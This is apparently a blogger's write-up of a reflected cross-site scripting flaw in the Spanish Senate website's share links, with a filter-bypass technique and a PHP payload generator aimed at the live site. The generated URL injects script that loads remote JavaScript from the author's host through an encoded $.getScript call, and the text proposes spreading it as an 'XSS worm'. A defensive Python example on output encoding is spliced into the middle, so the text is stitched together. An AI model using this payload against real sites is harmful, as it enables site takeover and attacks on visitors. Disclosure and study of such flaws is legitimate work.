In the next example I add a new attribute named "aaabbb" with the value "hello" to the social links:
Ok, I can add attributes to the links. Now the problem is that if I try to use any of these characters: ', <, >, (, ), the page redirects us to a 404 page:
Well, we have a problem: we can insert JavaScript code inside the attributes, but we can't execute anything without the ( or ) characters... or can we?
If I insert an attribute, for example onmouseover, I can insert assignments, for example:
var aux1 = this.parentNode.parentNode.innerHTML;
We didn't use any of the forbidden characters, and we get a very interesting string like:
<link type="text/css" href="/web/css/jquery-ui.css" rel="stylesheet"><a href="#" title="Enviar"><img src="/web/images/enviar.png" alt="Enviar" onclick="MostrarDialog();" title="Enviar"></a><a href="#" onclick="$("#menu_buscador").hide();
Ok, what can we do with variable assignments and this string in JavaScript to execute code outside the jail?
We can, for example, do the following:
this.innerHTML = "<img onload=\"code_to_execute();\">";
But... as you can see, I'm using the <, (, ) and " characters, and I can't use these characters in the URL. So, to create the "<img..." string, I can use the string I got in the aux1 assignment.
For example, for the < character I can use aux1[0], which concatenated with aux1[2] gives me the string "<i", and I don't need to use any of the forbidden characters. Then, doing:
this.innerHTML = aux1[0] + aux1[2] ....
I can obtain any string to be used as innerHTML, so I'm out of the jail :)
It's really tedious to create complex strings by concatenating characters one by one, so to make this easy I wrote a very simple PHP script:
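The root cause described above is a character blocklist applied to a value that is then written unencoded into an HTML attribute. The following Python script is an added example, not code from the original post or from the site in question: it emulates the blocklist (', <, >, (, )), renders a share link the vulnerable way and the hardened way (attribute encoding with html.escape), and then parses the result the way a browser would to show which version ends up with an extra event-handler attribute. The rendering functions and the sample payload are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Characters the site's filter rejects, as described in the write-up.
BLOCKED_CHARS = set("'<>()")


def blocklist_accepts(value: str) -> bool:
    """Emulate the blocklist filter: True if the value would be accepted,
    i.e. it contains none of the blocked characters."""
    return not any(ch in BLOCKED_CHARS for ch in value)


def render_share_link_unsafe(url: str) -> str:
    """Vulnerable pattern (assumed for illustration): the URL is interpolated
    into the href attribute without any output encoding."""
    return f'<a href="{url}">share</a>'


def render_share_link_safe(url: str) -> str:
    """Hardened pattern: attribute-encode the value. html.escape(quote=True)
    turns &, <, >, " and ' into entities, so the value can never terminate
    the attribute it is placed in, whatever the blocklist lets through."""
    return f'<a href="{html.escape(url, quote=True)}">share</a>'


class AttributeCollector(HTMLParser):
    """Collect (tag, attribute name, attribute value) triples the way a
    browser sees them after parsing; entity references in attribute values
    are decoded by the parser, exactly as a browser would decode them."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            self.found.append((tag, name, value))


def parsed_attributes(markup: str):
    """Parse markup and return the list of (tag, name, value) triples."""
    collector = AttributeCollector()
    collector.feed(markup)
    collector.close()
    return collector.found


def event_handler_attributes(markup: str):
    """Names of on* attributes a parser finds in the rendered markup."""
    return [name for _, name, _ in parsed_attributes(markup) if name.startswith("on")]


# Constructed sample input: a "URL" that closes the href attribute with a
# double quote (which the blocklist does not reject) and appends a handler.
SAMPLE_PAYLOAD = 'http://example.test/page.html" onmouseover="aux1=this.parentNode.innerHTML;'


if __name__ == "__main__":
    print("blocklist accepts payload:", blocklist_accepts(SAMPLE_PAYLOAD))
    print("unsafe render ->", event_handler_attributes(render_share_link_unsafe(SAMPLE_PAYLOAD)))
    print("safe render   ->", event_handler_attributes(render_share_link_safe(SAMPLE_PAYLOAD)))
```

The point the parse makes visible: the blocklist accepts the payload, the unencoded render produces a second attribute (onmouseover) on the anchor, and the encoded render produces a single href whose value is the whole payload string, harmless as an attribute value. Encoding for the output context is the fix; blocking characters is not.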
<?php
function buildInjection($inStr)
{
    // This is the string that this.parentNode.parentNode.innerHTML returns
    // to the injected JavaScript; every character we need is looked up in it
    $auxString = '<link type="text/css" href="/web/css/jquery-ui.css" rel="stylesheet"><a href="#" title="Enviar"><img src="/web/images/enviar.png" alt="Enviar" onclick="MostrarDialog();" title="Enviar"></a><a href="#" onclick="$("#menu_buscador").hide(); $("#menu_compartir").toggle();" title="Compartir"><img src="/web/images/compartir.png" alt="Compartir" title="Compartir"></a><div style="display: block;" id="menu_compartir" class="cortinaMenuTop2"><a href="http://www.tuenti.com/share?url=http://www.senado.es/web/conocersenado/arteypatrimonio/obrapictorica/index.html?http://tras2.es/ecce.pngSC0123456789," onmouseover="var aux1 = this.parentNode.parentNode.innerHTML;';
    $resultChars = array();
    for ($count = 0; $count < strlen($inStr); $count++) {
        // Position of the first occurrence of this character in the reference string
        if (($pos = strpos($auxString, $inStr[$count])) === false) {
            echo "ERROR: character: " . $inStr[$count] . " not found! :'(" . PHP_EOL;
            continue; // skip it instead of emitting an invalid aux1[] index
        }
        // Each character becomes an index expression into aux1
        $resultChars[] = "aux1[" . $pos . "]";
    }
    // Join the index expressions with + so they concatenate in JavaScript
    return implode('+', $resultChars);
}
echo "http://www.senado.es/web/conocersenado/arteypatrimonio/obrapictorica/index.html?" . urlencode('http://tras2.es/ecce.pngSC0123456789," onmouseover="aux1 = this.parentNode.parentNode.innerHTML; this.innerHTML = ' . buildInjection("<img src=\"http://tras2.es/ecce.png\" onload=\"$.getScript(String.fromCharCode(104,116,116,112,58,47,47,116,114,97,115,50,46,101,115,47,115,101,110,46,106,115));\" />") . ';"') . PHP_EOL;
The code that I inject replaces the art gallery with another, more sophisticated one :) :
In summary: no, we don't have a persistent XSS, but we do have control of the site through the social links, so we can, for example, share this URL instead of the correct one on the social networks as an "XSS worm":
I reported this bug a week ago to the official Senate Twitter account and by e-mail, but I didn't receive any answer:
A video that shows the whole process: